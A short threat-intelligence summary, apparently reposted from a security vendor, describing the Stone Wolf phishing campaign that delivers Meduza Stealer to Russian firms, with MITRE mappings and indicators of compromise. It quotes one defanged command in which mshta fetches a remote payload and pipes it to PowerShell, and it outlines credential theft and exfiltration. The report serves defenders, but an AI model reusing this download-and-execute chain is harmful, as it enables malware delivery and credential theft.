Threat Research

Stone Wolf Utilizes Meduza Stealer to Breach Russian Corporations

Securonix

Stone Wolf operation uses Dostavka_Promautomatic.zip to lure victims with a decoy document and a maliciousMeduza Stealer link, then downloads and runs payloads via a Windows shortcut, including an HTA file and PowerShell-based loader. The stealer gathers credentials and system data and exfiltrates it to a control server over TCP. #StoneWolf #MeduzaStealer #Dostavka_Promautomatic.zip #In2al5dP3in4er #MSHTA

Keypoints

  • The adversaries distribute a malicious archive named Dostavka_Promautomatic.zip.
  • The archive contains a decoy .docx document and a malicious link to Meduza Stealer.
  • Opening the link executes a command that downloads and runs a Windows shortcut.
  • The command downloads an HTA file and executes it using MSHTA and PowerShell.
  • The decrypted script downloads additional files and replaces the original malicious URL file.
  • In2al5d P3in4er is used to download and run Meduza Stealer, a malware-as-a-service with subscription options.
  • Meduza Stealer collects credentials, system information, and other sensitive data, then exfiltrates via TCP to a control server.

MITRE Techniques

  • [T1566.001] Phishing – “The archive contains a .docx legitimate document used as a decoy.”
  • [T1059.001] PowerShell – “the command through the PowerShell interpreter.”
  • [T1059.005] VBScript (Windows Script Host) – “Windows Script Host: Use of VBScript to execute commands.”
  • [T1218.005] Mshta – “mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -“.
  • [T1547.001] Boot or Logon Autostart Execution – Registry Run Keys / Startup Folder – “Modifying the startup behavior of applications.”
  • [T1003] Credential Dumping – “The stealer retrieves data … account credentials saved in Outlook” and “Windows Credential Manager and Windows Vault data…”
  • [T1041] Exfiltration Over C2 Channel – “The collected data is sent to the control server via TCP.”

Indicators of Compromise

  • [File name] Dostavka_Promautomatic.zip – archive distributed with decoy and malicious link; and 2 more items (Scan_127-05_24_dostavka_13.05.2024.pdf.url, Scan_127-05_24_dostavka_13.05.2024.exe)
  • [File name] Scan_127-05_24_dostavka_13.05.2024.pdf.url – malicious link to Meduza Stealer
  • [File name] Scan_127-05_24_dostavka_13.05.2024.exe – HTA payload downloaded and executed
  • [URL] http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe – remote payload location
  • [URL] http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdf – downloaded PDF path
  • [Domain] api.ipify[.]org – used to obtain public IP
  • [IP] 193.124.33.71 – remote server address

Read more: https://bi.zone/eng/expertise/blog/stone-wolf-atakuet-rossiyskie-kompanii-stilerom-meduza/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint